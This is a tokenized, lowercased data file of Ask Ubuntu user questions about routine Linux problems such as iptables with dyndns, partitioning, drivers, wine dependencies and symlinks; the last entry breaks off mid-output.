58260	emerald -- replace does n't do anything	i previously had emerald working with 11.04 , as i had compiled from source . this morning , though , i updated a series of packages , and now emerald -- replace does n't work any longer . i know for a fact that it updated the kernel , but i ca n't seem to find a place where it will tell me what else it updated . ( i blindly accepted updates , thinking that they were just minor ) . at any rate , i recompiled emerald , and i ran it from the terminal to see if there is something that 's going wrong , but when i run emerald -- replace , it runs just fine , just does n't change my theme when i select a new theme from the emerald theme manager . it does , however , report that it is reloading ... when i select a new theme - so it does seem to be running correctly . could it be there is something in conflict with it ?
58261	how can i create a private cloud ?	how can i create a private cloud computing environment using ubuntu ; i have installed ubuntu desktop and tried converting to ubuntu-server . what commands or steps that i need to follow to setup a basic version of cloud computing that can be exposed to external users ( internet )
58262	how do i add a dyndns alias to my iptables ?	first of all : i 'm aware of this old question : iptables allow dyndns domain name and auto update rules but somehow it does n't help me . the problem iptables on my work pc are configured to drop all requests from the internet except for a few chosen ip-adresses . this is because we face about 10,000 attacks a day . form time to time i 'd like to ssh into my work pc from home . at home however i do not have a static ip . my solution ( semi-working ) so i figured i register with dyndns and add a rule to /etc/iptables for that dynalias myuser.dynalias.net : # in /etc/iptables *filter : input accept [ 0:0 ] : forward accept [ 0:0 ] : output accept [ 0:0 ] : rh-firewall-1-input - [ 0:0 ] -a input -j rh-firewall-1-input -a forward -j rh-firewall-1-input -a rh-firewall-1-input -i lo -j accept # namesevers -a rh-firewall-1-input -p 50 -d some.local.ip -j accept -a rh-firewall-1-input -p 51 -d the.same.local.ip -j accept # ... and so on ... # all connections already established ( started outgoing from my machine ) -a rh-firewall-1-input -m state -- state established , related -j accept # allow local connections -a rh-firewall-1-input -m state -- state new -m tcp -p tcp -- dport 22 -- source some.local.ip/255.255.0.0 -j accept # allow my dns -a rh-firewall-1-input -m state -- state new -m tcp -p tcp -- dport 22 -- source myuser.dynalias.net -j accept # block all others ( without answering - thus nobody is able to scan the network ) -a input -p icmp -- icmp-type echo-request -j drop -a rh-firewall-1-input -j drop commit what 's not working with this solution that works until my home ip is reset each day at midnight . so on weekends i 'm basically screwed and can not login . my guess is , that i have to update the rule on a regular basis ( e.g . using cron ) . my question is : how do i update the rule on regular basis ? for some reason , when i update the table on a running system using : the update commands ( not working ) : sudo iptables -d rh-firewall-1-input -m state -- state new -m tcp -p tcp -- dport 22 -- source ip.that's.listed.by.-l.option -j accep sudo iptables -a rh-firewall-1-input -m state -- state new -m tcp -p tcp -- dport 22 -- source myuser.dynalias.net -j accep i can not ssh into my work pc after that update . the only thing that helps is calling someone to reboot my work pc . somehow the changes will not take effect without that reboot despite the rule being listed correctly : username @ server : ~/bin $ sudo iptables -l chain input ( policy accept ) target prot opt source destination rh-firewall-1-input all -- anywhere anywhere drop icmp -- anywhere anywhere icmp echo-request chain forward ( policy accept ) target prot opt source destination rh-firewall-1-input all -- anywhere anywhere chain output ( policy accept ) target prot opt source destination chain rh-firewall-1-input ( 2 references ) # some stuff ( e.g . nameserver ) # ... . drop all -- anywhere anywhere accept tcp -- 123-123-12-123.host.name.foo.bar.at anywhere state new tcp dpt : ssh in this listing there is no difference before and after update at all - it just does n't work to ssh into the work pc .
58263	launch application via ssh	i am new to ssh . so now i can connect to a remote computer . i also can launch an application on a remote computer and see it 's gui on my screen . but i do not know how to launch an application without outputting on my screen . basically i want to launch an application ( eg . rhythmbox ) , and close the ssh connection , leaving the application running . without having any output to my screen . surfing the web i have found some advices , but nothing helped me ; ssh -x name @ domain nohup rhythmbox & logout hope you understood , sorry for my english .
58265	how can i rewrite lines in a txt file using grep [ sed ] ?	i have a text file where each line has the format like this ... 25126 akers , david and i 'm needing to put it in a format like this to insert into a database ... 25126 ; akers , david ; only problem is there might be some with names having spaces like ... 25257 ah you , c.j . i was told i should use grep but i 'm not sure how to go about doing it .
58272	gparted shows `` unallocated '' on my sda drive ( parallel boot with win xp )	this question is similar to others , but none of the answers was conclusive for my case . i have windows xp installed on my laptop by default and later on i installed ubuntu 10.10 . grub2 is my bootloader and i can boot into both windows and ubuntu . however , recently i decided to give my ubuntu partition more space . i opened gparted but it only shows me `` unallocated '' for my sda drive ( only drive in the laptop ) . running system- > administration- > disk-utility i can see all my partitions sudo parted -l gives : error : can not have a partition outside the disk yesterday i stared an attempt to fix this , but ended up destroying grub2 which required some reinstall-trickery . i also installed boot-repair , but it only says something along the lines of : use a 64bits version my system is 32bit , no doubt about it . just to complete everything , this is the fdisk output : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xdcdcfe52 device boot start end blocks id system /dev/sda1 * 1 912 7325608+ 7 hpfs/ntfs /dev/sda2 913 10639 78132127+ 7 hpfs/ntfs /dev/sda3 10640 17544 55464381 7 hpfs/ntfs /dev/sda4 17545 19458 15374205 f w95 ext 'd ( lba ) /dev/sda5 17545 17756 1697860 83 linux /dev/sda6 17756 19380 13046784 83 linux /dev/sda7 19380 19458 621560 82 linux swap / solaris ( hdd was originally split half and half in a c : and d : drive . i used a part of the c : \ partition to install ubuntu ) how can i fix my patitions in a way that gparted can find them again ?
58274	my dvd 's will not play ?	i 've loaded everything suggested and almost all the multimedia apps available , and my dvd 's will not play . the device is found , /dev/sr0 as well as the required links to /dev/dvd ( for some programs ) . every lib ... so has been found and installed . the codecs are current . somethings missing still . i removed and reloaded the addon 's to mplayer , totem and several others . i added the ubuntu restricted ( mp ... , avi etc ) additions . i 've removed and reloaded totem , mplayer , vlc and several others and reloaded the addon 's and plugins again . i verified that the links to the devices are correct . i removed and reloaded the available codec 's . note : those videos i created on dvd from my beos system play just fine . further the digital copies play fine . it is only original dvd 's that are giving me fits . windows vista play them on an alternate boot drive .
58280	gedit modelines â what are they ? how do they work ?	there is a gedit plugin called modelines and the plugin is described as emacs , kate and vim-style modelines support for gedit . what are modelines ? and how do they work in gedit ?
58283	why doesnt notepad++ in wine display the filenames properly ?	tiny yet strange issue : in the list of files/folders , notepad++ running in wine completely ignores the last character . other than that it works perfectly under wine , so this is very strange to me . also a quick google did n't yield any other people with this issue ... it started to get really annoying in a folder where all my html files have a number in the name , at the end . versions : notepad++ : v5.9.3 . ( downloaded from the official website , followed an irretrievable guide to install ) wine : 1.2.2 .
58286	slow video after sleep on an lenovo edge 13	i have ubuntu 11.04 on my lenovo edge 13 with i3-380um processor ( with integrated graphics ) . after sleep/hibenate video is really choppy . after reboot all playack is fine . any ideas ? thank in advance .
58293	why does n't banshee have a dark toolbar like rhythmbox does ?	i 'm currently testing ubuntu 11.10 and i love it . the only thing that really bugs me is how banshee does n't have a dark toolbar , yet rhythmbox does . imo it really integrates it much better.. rhythmbox : banshee : i know the stable release is quite a ways away , but i 'm just curious as to why this is the case .
58295	how can i restore a corrupted shotwell db ?	while i was importing photos from a sd card in shotwell , my laptop has crashed ( shutdown because of over-heating ) . now , i can no longer launch shotwell : $ shotwell ** error : x86_64-linux-gnu/db/versiontable.c:104 : version_table_construct : assertion failed : ( res == sqlite_ok ) if i move the .db file ~/.shotwell/data/photo.db elsewhere so it is no longer present ( but backed-up ) , shotwell will launch , but will rebuild its library , which will be empty . i can re-import the folders shotwell creates , but i lose nearly all meta-data ( most importantly the `` folders '' , or events , and their main picture ) is there a way to repair/rebuild/restore photo.db ? how can i see what 's inside ? how bad it 's damaged ? or is there another way to get back my events and imports ?
58297	would the 32bit version of server be any more or less stable than the 64bit version ?	i am setting up a lamp server , and am looking at using a spare 32bit box i have .
58298	after computer upgrade streaming media is choppy	i just upgraded my computer to : amd x4 955 , mobo : msi 970a-g45 am # 3+ socket , gpu : xfx ati 6870 . after i upgraded i reinstalled 11.04 . now whenever i go to any live streaming media site like justin.tv or ustream for example , it is never a good stream . it is constantly choppy and stalls . i 've run speed tests and gotten good marks , but when downloading from the ubuntu server for upgrade i manage ~30kb/s , not sure if this is related . i 've installed adobe flash , uninstalled it , installed gnash , but no luck . installed restricted drivers for the gpu . all of this also happens in mint . onboard lan is realtek 8111e . pci wifi g card does n't help either . done some searching , but ca n't find an answer .
58299	what is the best way to deal with local deb packages ( i.e . ones not installed from repos ) ?	i just want a `` guru 's opinion '' on the best way to deal with those pesky little `` singleton '' debs that you do n't get out of any apt repo . for example google-chrome ( i know they finally made a repo ) , virtualbox , and unstable wine . i 'm actually using debian testing ( wheezy ) now , and i particularly miss wine and emerald . i 've had a lot of experience doing things the hard way then finding out about some really elegant trick that solves all problems . i 'm wondering if there is one for this . the closest thing i could find is http : //linuxwave.blogspot.com/2009/04/adding-local-directory-to-apt.html . this is pretty good , but us it as good as it gets ? i 'm considering eventually writing a shell/perl script that checks each package 's website for updates and downloads it ...
58301	sound stop working	i have a little problem , i touched something related to alsa on the software center , becuase there was a corrupted package that i tried to install ( alsa-conexant ... or something like this ) after removing it , the sound stop working , now at the taskbar it does not show the sound notification . i can acess sound config , via `` sound '' in applications , but when i try to choose a hardware , the list is in blank , there are no devices .
58302	i get a `` serious errors while checking the disk drives for /boot '' error while booting	i have just set up my new system by creating three partitions on a whole hard disk ( /boot , /home , swap and / ) . i saw this article and now i am getting those errors and the system provide me with some options : ( i to ignore , s to skip mounting or m for manual recovery ) . i am forced to choose skip mounting because i do n't know what manual recovery is . despite the error i get i think that the system boots okay because i can use the system but this error is very annoying .
58305	retrieving contents of multiple subfolders , and move them into single folder	i have downloaded over 7000 ebooks from project gutenburg , but i have an issue . each book has been placed in its own zip file , and each zip file has been given its own folder . my problem is that i do not want to have to go through each file and unzip them and put the ebooks in one place manually . if i can get the zip files in one place , it will be an easy job to unpack all of them with one command . so , how do i get my files into one folder , instead of in their own subfolders ?
58312	download remote ftp directory	how can i download a specified directory and all it 's files from an ftp server ( requiring username+password ) ?
58317	my kernel wo n't boot . what steps should i take ?	i installed versions 2.6.38~10 and 2.6.38~11 of the linux kernel via apt-get and unfortunately neither one boots at all . as soon as i select the kernel in grub , the kernel panics and the caps lock key flashes . the latest version of the kernel that i have that boots is 2.6.38~8 . i have tried editing the boot parameters by removing quiet and splash but that does absolutely nothing . what options do i have for debugging the kernel and finding out what is malfunctioning ?
58321	how do i install glib ?	i want to build the empathy in ubuntu 11.04 . when i follow the build process , ./autogen.sh the shell said to me that libtoolize : copying file `m4/lt~obsolete.m4' checking for autoconf > = 2.53 ... testing autoconf2.50 ... not found . testing autoconf ... found 2.67 checking for automake > = 1.9 ... testing automake-1.11 ... found 1.11.1 checking for libtool > = 1.5 ... testing libtoolize ... found 2.2.6b checking for glib-gettext > = 2.2.0 ... testing glib-gettextize ... not found . ***error*** : you must have glib-gettext > = 2.2.0 installed to build empathy . download the appropriate package for from your distribution or get the source tarball at ftp : //ftp.gtk.org/pub/gtk/v2.2/glib-2.2.0.tar.gz but when i can not find the way to install glib . what should i do to install that in ubuntu 11 ?
58325	how i can update a gcc from v 4.4.3 to 4.6.1 ?	how i can safe update a gcc compiler v 4.4.3 to 4.6.1 under ubuntu 10.04 ? i try : igor @ igor-desktop : ~ $ sudo add-apt-repository ppa : ubuntu-toolchain-r/test [ sudo ] password for igor : executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv 60c317803a41ba51845e371a1e9377a2ba9ef27f gpg : requesting key ba9ef27f from hkp server keyserver.ubuntu.com gpg : key ba9ef27f : public key `` launchpad toolchain builds '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) igor @ igor-desktop : ~ $ sudo apt-get install gcc reading package lists ... done building dependency tree reading state information ... done gcc is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 28 not upgraded . but do n't success : (
58326	trackpad non functional for newest hp pavilion dm4	i have a newest generation hp dm4 ( the trackpad and mouse buttons are separate , unlike in the previous generation ) . the trackpad works fine in windows , but in ubuntu the mouse is erratic and non responsive . by going up and down on the trackpad , i can sort of get the cursor to go left and right , and thats it . i think there is some software or driver problem , but that is the extent of my knowledge . i hope someone can help .
58328	system suggests removal of kdelibs-data on sudo autoremove	on trying to clean my system of unneeded packages via sudo apt-get autoremove it prompts me to remove kdelibs-data . i 'm obviously running kubuntu , natty that is , and am wondering if this is n't a bug since from what the package manager tells me this is a very much necessary package for many other packages in kubuntu/kde . i 'm also using the kde 4.7 sc ppa so maybe this could be the reason .
58330	ntfs file-system sharing control	i have a ntfs partition , and i want to share a folder , but i want to manage the access of the subfolders , for example this folder contains 20 subfolders , the desktop users have access to only 10 subfolders . how can i manage this ? how can i control a ntfs partition at all ?
58331	standard partitioning scheme for ubuntu home user	this thread is a continuation of my failed attempt to install ubuntu on a new pc . ive decided to reinstall ubuntu by using a simpler partitioning scheme . the one i made had four partitions ( / , /boot , /home and swap ) and after the booting i got the error i describe in the hyperlink above . ultimately which is the most standard partitioning scheme for a simple home user who does not need to install something else in this particular hard drive ( 320 gb ) ? ? ? please be specific regarding the type of partitions needed ( size , type , primary or logical etc )
58334	how to set guake as preferred terminal emulator for `` run in terminal '' ?	i 've recently installed guake and like it a lot . i 'd like to set it as my preferred terminal application . that is , when i right-click on a bash script file , click `` open '' , and choose `` run in terminal '' , i want it to open in a new guake tab . i 'm not sure where to set guake as the preferred app for `` run in terminal '' . and i 'm guessing that i might need the command to be something like guake -- new-tab=new -- execute-command= '' commandhere '' , so how do i pass that parameter ? ideally , i 'd like a terminal invocation to open a new guake tab , unless there is already one available . ( difficult to tell , what id there 's already a command running in the existing tab ? ) failing that , just opening a new guake tab is ok. also , is there an option to keep guake hidden when this happens ? already tried : based on how can i set default terminal used ? i have already tried : gconftool -- type string -- set /desktop/gnome/applications/terminal/exec guake - this made guake appear when i type ctrl-alt-t. setting x-terminal-emulator to \usr\bin\guake in alternatives configurator - this made no difference ( having already made the previous change ) .
58337	failed to generate a configuration file for xfce4-xkb-plugin from source	i 'm trying to generate a configuration file for xfce4-xkb-plugin from source and i get this error : alex @ alex : ~/repos/xfce4-xkb-plugin $ sudo ./autogen.sh preparing package directory /home/alex/repos/xfce4-xkb-plugin ... running glib-gettextize -- force -- copy ... copying file mkinstalldirs copying file po/makefile.in.in please add the files codeset.m4 gettext.m4 glibc21.m4 iconv.m4 isc-posix.m4 lcmessage.m4 progtest.m4 from the /aclocal directory to your autoconf macro directory or directly to your aclocal.m4 file . you will also need config.guess and config.sub , which you can get from ftp : //ftp.gnu.org/pub/gnu/config/ . running intltoolize -- automake -- copy -- force cp : can not create regular file `m4/intltool.m4 ' : no such file or directory intltoolize : can not copy '/usr/share/aclocal/intltool.m4 ' to 'm4/intltool.m4' how can i get the following files from the official repos ? codeset.m4 gettext.m4 glibc21.m4 iconv.m4 isc-posix.m4 lcmessage.m4 progtest.m4 config.guess config.sub
58338	xvidcap sound recording not working	i followed the steps in how to record internal audio with xvidcap ? ( not with microphone ) but i still ca n't get audio to record when recording a video app . playback produces a pulsed buzz are roughly 1 second intervals . pa volume control shows the record levels for recording by xvidcap to be right and corresponding the levels shown on the alsa capture , which the video app outputs . any ideas ? i 'm running lucid
58339	how to check whether ln -s created a symbolic link or a hard link ?	i 'm trying to create a symbolic link with ln -s old.file new.file but ln seems to stubbornly create hardlinks instead . for instance , when i move the link to another folder , it becomes broken . what 's happening here really ? am i missing something ? edit : output of ls -li before creating link : total 624 8536495 lrwxrwxrwx 1 benjamin benjamin 59 2011-08-14 14:21 alarm.wav - > /home/benjamin/.config/cairo-dock/third-party/gmail/hit.wav 8536499 -rw-r -- r -- 1 benjamin benjamin 663 2011-08-14 14:31 auto-load.conf 7344051 -rw-r -- r -- 1 benjamin benjamin 49708 2011-08-14 14:02 drip.wav 8536261 -rw-r -- r -- 1 benjamin benjamin 26313 2011-08-14 13:24 error.svg 7344049 -rw-r -- r -- 1 benjamin benjamin 267820 2011-08-14 14:02 glass.wav 8536267 -rw-r -- r -- 1 benjamin benjamin 3664 2011-08-15 22:05 gmail.conf 8526370 -rwxr-xr-x 1 benjamin benjamin 15224 2011-08-23 11:21 gmail.py 7344046 -rw-r -- r -- 1 benjamin benjamin 11052 2011-08-14 14:21 hit.wav 8536293 -rw-r -- r -- 1 benjamin benjamin 24153 2011-05-26 16:17 icon 9186712 drwxr-xr-x 3 benjamin benjamin 4096 2011-08-13 15:35 nbproject 7344050 -rw-r -- r -- 1 benjamin benjamin 113196 2011-08-14 14:02 pop.wav 8536418 -rw-r -- r -- 1 benjamin benjamin 10762 2011-08-14 14:24 preview 7344048 -rw-r -- r -- 1 benjamin benjamin 44844 2011-08-14 14:02 stick.wav 8536286 -rw-r -- r -- 1 benjamin benjamin 23848 2011-08-14 13:32 svgmaker.py 8536304 -rw-r -- r -- 1 benjamin benjamin 22662 2011-08-14 13:32 svgmaker.pyc then command ran is ln -s gmail.py gmail after running that command , ls -li returns : total 624 8536495 lrwxrwxrwx 1 benjamin benjamin 59 2011-08-14 14:21 alarm.wav - > /home/benjamin/.config/cairo-dock/third-party/gmail/hit.wav 8536499 -rw-r -- r -- 1 benjamin benjamin 663 2011-08-14 14:31 auto-load.conf 7344051 -rw-r -- r -- 1 benjamin benjamin 49708 2011-08-14 14:02 drip.wav 8536261 -rw-r -- r -- 1 benjamin benjamin 26313 2011-08-14 13:24 error.svg 7344049 -rw-r -- r -- 1 benjamin benjamin 267820 2011-08-14 14:02 glass.wav 8519869 lrwxrwxrwx 1 benjamin benjamin 8 2011-08-23 11:27 gmail - > gmail.py 8536267 -rw-r -- r -- 1 benjamin benjamin 3664 2011-08-15 22:05 gmail.conf 8526370 -rwxr-xr-x 1 benjamin benjamin 15224 2011-08-23 11:21 gmail.py 7344046 -rw-r -- r -- 1 benjamin benjamin 11052 2011-08-14 14:21 hit.wav 8536293 -rw-r -- r -- 1 benjamin benjamin 24153 2011-05-26 16:17 icon 9186712 drwxr-xr-x 3 benjamin benjamin 4096 2011-08-13 15:35 nbproject 7344050 -rw-r -- r -- 1 benjamin benjamin 113196 2011-08-14 14:02 pop.wav 8536418 -rw-r -- r -- 1 benjamin benjamin 10762 2011-08-14 14:24 preview 7344048 -rw-r -- r -- 1 benjamin benjamin 44844 2011-08-14 14:02 stick.wav 8536286 -rw-r -- r -- 1 benjamin benjamin 23848 2011-08-14 13:32 svgmaker.py 8536304 -rw-r -- r -- 1 benjamin benjamin 22662 2011-08-14 13:32 svgmaker.pyc
58340	how to check node.js application with monit	we have an app in node.js , we are using startup for starting and stoping . but we want to implement monit for monitoring the app . so what i have done is installed monit . changed configure file . here is my config file . check host statupprogramwith address 68.178.232.100 start `` /sbin/start statupprogram '' stop `` /sbin/stop statupprogram '' if failed port 8002 protocol http request / with timeout 5 seconds then restart i am following http : //wellconsidered.be/nodejs-with-upstart-and-monit why this message is not coming when i stop stop startupprogram why this message is not coming remote host 'startupprogram' status connection failed monitoring status monitored port response time -1.000s to 109.74.206.126:8124/ [ http via tcp ] data collected fri mar 25 19:01:55 2011
58348	memory limitations of 32bit systems	i am on a 32bit ubuntu system and as we know there is a memory limitation of 3.5gb at most . is there a possibility to take advantage of the rest of the memory on my system ( i have 8gb ) by running vmware player and giving like 3gb to the system running in the player ? ? my cpu is amd phenom ii x6 1090t
58351	can i review programs that are from ppa 's ?	after a tip from omg ! ubuntu ! i added a ppa and installed a programme . i 'm very happy with the programme and would like to review it in the software centre . unfortunately , i get the message 'failed to submit review ' all the time ( i have a working internet connection ) . hence my question : is it possible to review programmes which are not installed through canonical but third-party ppa 's ?
58354	how to stop the redirect after fog uninstall ?	i have uninstalled fog server from my ubuntu 11.04 however , when i try to access the machine ip : http : //192.168.0.22/ it is redirected to : http : //192.168.0.22/fog/index.php and i get a 404 error . what do i need to check in order to stop this redirect ?
58360	freezes when lid is closed on a dell e6500	installed 11.04 x64 on my dell e6500 some time ago and it freezes sometimes when i close my laptop . after some search i did following actions : disabled sync to vblank in compiz settings switched off screen saver but is still freezes . last one happened few hours ago : i was able to move mouse , but that 's it - i could n't click anything . i pressed ctrl-alt-backspace and restarted x. uname -a : linux rgwork 2.6.38-11-generic # 48-ubuntu smp fri jul 29 19:02:55 utc 2011 x86_64 x86_64 x86_64 gnu/linux dmesg , x.org and dpkg -l on pastebin update : it just froze again . i can move my mouse , and i see that the cursor changes to when i move my mouse ( probably when it 's going over some textfield ) , but screen remains blank . i tried to go to sleep mode and wake it back , but screen remained black . new x.org log on pastebin and dmesg on pastebin
58364	what 's the difference between multiverse , universe , restricted and main ?	i 've been peeking into the ubuntu respository and i see four folders , multiverse , universe , restricted and main . what do they represent ?
58368	transmission configuration : how many torrents and privacity options ?	how many torrents can i download at a time with transmission ? i do n't understand why some blogs talk about 1-3 at a time . i have 10 at a time because it depends how many peers are connected . the amount of all downloads is always less than 300 kb/s , if i 'm ufortunate 40-160 kb/s . when i 've only got 3 active torrents i do n't see any difference in kb/s from when i 've got 10 active torrents . and second : the wire or lan options , about choose and aleatory port when transmission starts or the block list , are importants ? how to configure both and how this configuration makes better connection with transmission ?
58369	server + gui installed , starting to get messy	i installed ubuntu server and then i wanted a gui and i did n't want the server anymore . so i installed the gui and every-time i restart my computer it goes to an ubuntu loading screen which `` loads '' forever . i switch over to a virtual terminal and i execute startx which eventually gives me the login window . unfortunately , when i tried to upgrade to 11.04 the update manager hanged for 20 minutes at ( checking package manager ) so i had to force reboot . i 'm updating through the server command line and it 's starting to get messy . i 'm wondering if i could remove the server `` part '' or have to reinstall via the live cd .
58371	download lastfm tags into mp3 comment or genre tag	for a long time i dream to have a songs lastfm tags in my music library , so i can use them to quickly generate playlists . there used to be a way to do that in amarok 1.4 , but it never was stable . than there is musicbrainz picard 's lastfm/lastfmplus plugin . it is partially fine , but i can not manage to make it look only for the lastfm tags and put them into comments/genre/whatever but it always hast to tag everything . and it is n't particularly good with it , especially with small bands , songs without album etc . my music library is rather well organised . most of the tags are correct . i also have quite some songs without an album . and i do n't want it to find the albums for those songs , since it 'd mess up my album view . so it must not touch the fields track name , track number , artist and album . all i want is that the most popular lastfm tags get into the genre or comments tag of the mp3 , separated by semicolons , commas or whatever . i think i remember a script that did this job , but i can not find . does anybody know if there is anything like this ? would it be to hard to write this , for example as banshee plugin ? thank you
58372	how to disable all password prompts ?	anything i want to download or to perform the easiest tasks , i am prompted for my password . all though this is an excellent security feature , it is a real inconvenience . i tried sudo visudo and changed % all= ( all ) all to nopasswd : all saved and exit to no avail . need suggestions .
58376	how do i install the intel hd 3000 video driver ?	how do i install a new video driver ? i need to install the intel hd 3000 video driver in my pc which is running ubuntu 10.04 .
58377	spellchecker for linux with latex support and export option ?	i 'm looking for a command-line spellchecker with latex input support and an option for exporting a report with all the problems it found in the file . ispell is interactive and does n't export a report , aspell also does n't .
58378	what exactly does sudo apt-get -f install do ?	i have seen it before . i am just wondering what exactly does it do ?
58379	how can i permanently change the text size for gnome-terminal ?	i just wanted to ask ... it seems that you need to press ctrl + - ( ctrl plus the minus sign ) in order to get better resolution ( smaller text ) when running terminal . but i was wondering if there was a way to do keep the settings this way , so that whenever you start up the terminal it will already be performing in higher resolution ?
58385	help on if-else in shell	please help me writing a shell programming using if else , all possibile code using [ [ ] ] , [ ] , ( ( ) ) . i tried but it does not work ( you can check my previous question arithmetic binary operators -gt , -lt give error but work in a shell script ) . here is the c version : int i = 10 , n = 20 ; if ( i < n ) printf ( `` i smaller '' ) ; else if ( i > n ) printf ( `` n smaller '' ) ; else printf ( `` same '' ) ;
58387	getting the banshee-extension-soundmenu in 10.04 ?	i 've tried to install banshee-extension-soundmenu which is n't available in my 10.04 repos , so i did some research but could n't find a repo that offers it for my ubuntu version . how can i install it and get the wonderful buttons into my sound menu ?
58390	how can i open port 80 ?	i wanted to open port 80 , because i wanted to host from my localmachine using dyndns.org ; i followed the steps where it said me to install ddclient for dynamic ip . now i need to know how to open this port 80 from ubuntu . can i use iptables for port forwarding .
58397	how do i fix very slow/choppy experience with an ati radeon hd 5850 xtreme ?	i 've just installed ubuntu 11.04 64 bit and the gui feels really slow and choppy . running glxgears for example feels like i 'm killing my pc because everything becomes really choppy and it looks like i do n't even get 1 fps in glxgears . but in the console it says i get about 4.200 fps . i 've tried installing the latest driver manually with this guide : http : //wiki.cchtml.com/index.php/ubuntu_natty_installation_guide . it did n't help . i also tried this : http : //www.jondev.net/articles/ubuntu_11.04_choppy_or_slow . did n't help either . so right now i have catalyst 11.5 installed via the x-updates ppa . if you have any ideas , then please help me because at the moment my ubuntu installation is hardly usable ( oh , btw . reinstalling it did n't help ) .
58398	will ubiquity recognize windows 7 on different hdd for dualboot ?	for the installation on my laptop , where i have only one hdd with win 7 , the installer automatically detected my 64 gb free space and installed ubuntu to this space and grub was properly setup for dualboot . ( the first page of the installer already offered me the option to do so . ) now i want to install ubuntu on my desktop pc where i have a slightly different setup : on my first hdd i have 320 gb where i have win 7 installed . my second hdd ( not partition ! ) of about 1 tb is split up into 896 gb for use in windows ( not another instance of win 7 ! ) and 128 gb free space where i want to install ubuntu . will ubiquity recognize win 7 on my other hdd and install grub without problems , as i do not want to reinstall windows ; )
58400	libreoffice keeps crashing when i start it up ?	before the load bar is done it freezes my os up .
58404	how to start and stop a service ?	are there any other command to start stop restart service in ubuntu other than the below following . service -- status-all service < service name > stop sudosysv-rc-conf
58411	gwibber 3.1.5 almost unuseable	after a recent update my gwibber installation is almost totally useless . i 'm wondering what the process is to totally uninstall my system of gwibber and all its ' files and start over with a completely new installation . the version i 'm having problems with is 3.1.5 and would like to downgrade to the last stable version . thanks in advance !
58413	remove ubuntu one from messaging indicator	i have been trying to find a way to remove the ubuntu one entry from the indicators ' panel . i have removed the ubuntuone file from /usr/share/indicators/applications and edited it out of the seendb.keyfile in ~/cache/indicators/messages/ but it keeps returning . i just want it gone , as i do not need it at all . how can i do it ? i have ubuntu natty amd64 .
58416	how can i preview html documents from the command line ?	i use catdoc to preview word documents from the command line . is there something similar for html ? in other words i would like to do cathtml webpage.html | less and get more or less a man page look output .
58425	how to run testsuite for gcc ?	i 'm a newbie in linux . i have installed ubuntu 11.04 ( 64 bit ) . i want to install gfortran ( gcc ) . they sugest to run testsuites first . then i installed dejagnu . i have found in http : //pcc.ludd.ltu.se/standards_and_regression_testing/gcc_testsuite/ some instructions . i followed them up . however , when trying runtest -- tool gcc -- srcdir ./testsuite test/testfile.exp i get can not trap sigsegv while executing '' trap { send_user `` \nsegmentation violation\n '' ; exit 1 } sigsegv '' ( file `` /usr/local/bin/../lib/dejagnu/runtest.exp '' line 31 ) could you help me to get started with the gcc testsuite ? thanks in advance . sincerely , dr. lautaro vergara
58427	rollback xubuntu-desktop install : change gdm theme	i recently installed xubuntu-desktop but much to my dismay , lots of applications came with it that i did n't want . i apt-get removed xubuntu-desktop but it turns out i had to go through each programme and remove it manually anyway , now that i have done that , i have a proper desktop apart from the login screen still shows the xubuntu theme . how can i change it to its original ubuntu default theme ? is there a way that avoids installing ubuntu tweak ?
58428	can the ubuntu logo be used for a commercial website ?	is there an ubuntu logo that can be used on a commercial website to indicate that ubuntu can be installed for customers ?
58442	why does the lubuntu minimum install say that it requires 10.7 gb of available drive space ?	i have a 4gb dell mini 9 . i used unetbootin following the instructions at pendrivelinux.com . i have tried xubuntu minimal install , lubuntu minimal install , and vanilla lubuntu , and all result in the same issue : the second screen of the install 'preparing to install ubuntu ' says 'for best results , please ensure that this computer has at least 10.7 gb available drive space ' . am i doing something wrong ? the system requirements for these oses are much lower than 10.7gb .
58443	shrinking root device size after install ?	i installed ubuntu after installing a fresh copy of windows . unfortunately i accidentally clicked on one of the pre-set options and did not get a chance to manually specify the size of my root partition and swap space . i had 350gb of unallocated space and ubuntu made the entire 350gb the root drive ( .ext4 ) . seeing as using fdisk or resize2fs inside ubuntu would be bad as this is the root drive , would it be ok if i used a windows based partitioning program to resize the root partition ? i want to shrink the root partition down to 100gb and have the remaining 250gb as a ntfs parition that i can use in windows and mount on ubuntu . i know this is a lot of text but thanks for reading !
58448	how to increase the screen resolution ?	i installed ubuntu in my lenovo thinkpad x60 . currently the screen resolution is set to 1024x768 , which is the maximum resolution in the settings . is it the hardware maximum resolution ? compared to what has been in windows xp , everything looks so big . how can i make them all small ?
58451	how can i achieve windows-like drag and drop behaviour ?	it is a problem to drag item from one window to another when they are overlapped . when we click in a window it immediately focused and upper window go behind of this . but i found that in windows and mac they immediately focused when press in blank space , when select an item it does not switch immediately . it switched after release mouse button . so main idea like this : when click on blank space ( lower window ) then switch focus after press mouse button ( not release ) when click on an item ( select something ) then switch focus after release mouse button ( hold switch focus until mouse button release ) i want to simulate this in ubuntu . so need to replace mouse press and release behaviour . means when mouse press it signal to ubuntu that it release and vice versa . how to do this in ubuntu ?
58455	can not install wine on ubuntu natty 64bit [ broken dependency ]	i 've just installed ubuntu natty 64bit . now i 'm trying to install wine and no matter how i do it ( software center/synaptic/terminal ) , it fails . here 's what i tried on terminal : sudo apt-get update sudo apt-get install wine it shows : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.3 but it is not going to be installed depends : ia32-libs ( > = 1.6 ) but it is not going to be installed depends : lib32asound2 ( > 1.0.14 ) but it is not going to be installed depends : libc6-i386 ( > = 2.6-1 ) but it is not going to be installed depends : lib32nss-mdns ( > = 0.10-3 ) but it is not going to be installed e : broken packages any body faced this ? is this a bug or something is broken on my end ? any hints on how to solve ? edit : i 've tried with aptitude , it gives more clear message : sudo aptitude install wine output : the following new packages will be installed : gnome-exe-thumbnailer { a } ia32-libs { a } icoutils { a } imagemagick { a } 